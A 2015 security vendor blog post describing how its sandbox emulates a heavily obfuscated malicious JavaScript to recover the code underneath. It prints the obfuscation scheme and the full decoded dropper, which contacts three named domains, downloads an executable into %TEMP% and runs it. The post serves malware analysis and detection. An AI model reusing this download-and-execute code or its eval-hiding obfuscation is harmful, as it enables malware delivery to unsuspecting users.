Tuesday, September 29, 2015

Sandboxes are not dead: automatically decoding a heavily obfuscated javascript

That's right. Sandbox technology is not dead, but some implementations can turn out to be if they are not maintained to adapt to the ever-changing threat landscape. In this blogpost we will take a look at a heavily obfuscated javascript and present some output of VxStream Sandbox's new decoder engine (just as Google, we consider any aspect of our product to be beta).

While malicious javascript is usually just the first step of an attack and often acts as a dropper, it can make sense to read the underlying source-code and understand how the algorithm of generating the point of contacts, in order to create better static signatures or more predictable firewall rules. While this is not a primary 'Sandbox' issue in general (as sandbox technology focuses mostly around runtime behavior, it is for the specific case of VxStream Sandbox, which tries to implement and combine static and dynamic analysis technologies.

Understanding the Obfuscation


Let's take a look at the basic Javascript and its structure.

// the ID of this campaign
var str="5550535E080510A4A070B4A0D085E17011614565E55505057575152575555";

(...) 

// declare some string concatenating functions in random order
function ulln() { byfmst += 'r dn'; }; function xvtm() { byfmst += 'if ('; }; function bngfzt() { byfmst += 'mira'; }; function ydxxy() { byfmst += 'i-f'; }; function jjtwpgj() { byfmst += 'ew A'; }; function rfvfwwa() { byfmst += 'ring'; }; function uqvvt() { byfmst += '.cl'; }; function lkqok() { byfmst += '00'; }; function rmpmy() { byfmst += '}; i'; }; function oljwc() { byfmst += '== '; }; function agxgrsy() { byfmst += 'am'; }; function zvlw() { ygwoys += 'val'; }; function geypt() { byfmst += 'ode'; }; function ckqdv() { byfmst += 'ia.co'; }; function ydfkjy() { byfmst += 'f ('; }; function wyzo() { byfmst += 'id='; }; 

(...)

// put together all the strings
ulln(); jfqzddc(); srgjly(); xdvhde(); fafqmrk(); xcltdch(); kvbykg(); cxoi(); umlo(); jikrct(); myzkelk();
(...)  

// finally trigger the payload using the re-built strings

this[ygwoys](byfmst);

As we can see from reading the above code (the comments were not part of the script, of course): it's quite obfuscated and not very understandable, nor is there some easy way to recreate the source-code or intention. Basically, what the malicious javascript* is doing to hide the "eval(payload)" operation (which is a very typical scheme by the way and prone to eval->print replacement attacks) is to split the underlying strings into a number of string concatenation operations nested in function calls. The nested aspect makes it quite diffcult for pure static deobfuscation to recreate the original string, because the function order declaration is randomized as well (i.e. a linear scan will not work).


* the full sample download and SHA256 is available on the report linked at the very bottom

Decoding the obfuscated Javascript


So what did we do to beat the obfuscated Javascript? Well, without going in too many details, we basically parsed the Javascript and emulated its execution, recreating the obfuscated strings allowing us to understand what is happening. This is how the "decoded and deobfuscated" javascript looks:

function dl(fr) {
    var b = "i-fizz.com siliconmedia.com samiragallery.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1;
                xa.write(xo.ResponseBody);
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {};
                };
                xa.close();
            };
        };
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
            xo.send();
        } catch (er) {};
        if (dn == 1) break;
    };
};
dl(5341);
dl(9852);
dl(9423);


Looks better now? :-) Well, inspecting the code it becomes quite evident what is happening. The only interesting aspect seems to be the requirement for the response body (xa.size > 5000) and the 'id' and 'rnd' parameters passed as part of the 'document.php' GET request. It seems like random seeds and a campaign identifier.

Putting it all together in the report


So where do you find all this wonderful data in the report? Well, we created a few behavior signatures that make it a little easier for you to track down some of the deobfuscated strings. Also, keep in mind that any "string" extracted from any aspect of VxStream Sandbox is piped back to the string behavior signature interface, so you will see some regex matches on the URLs/domains. Following are some screenshots that highlight interesting parts of the report. It should be noted that the Javascript executed as expected: the extracted domains were contacted (see network traffic section) and files were dropped, most of them with VirusTotal rates at 1/56 or even marked as clean.





Report Link: https://www.reverse.it/sample/4a549052e2ab20d1b05e7c3bf54330a7058294f6bce919c3a6cedc9362e40324?environmentId=1

 

Conclusion


Sandbox systems can be quite sexy, if the underlying technology is sound and the codebase is updated on a regular basis. For us, the bottom line is that "automated malware analysis" is a cat & mouse game - something that every honest IT security vendor will admit. Analyzing programs automatically is simply very difficult and every day criminal gangs (and other parties) think of new tricks to bypass existing systems. That is one of the reasons why the webservice at http://www.reverse.it is public. The diversity is a perfect stress test and gives us the ability to constantly improve the system looking at failing samples, but it's a full time job.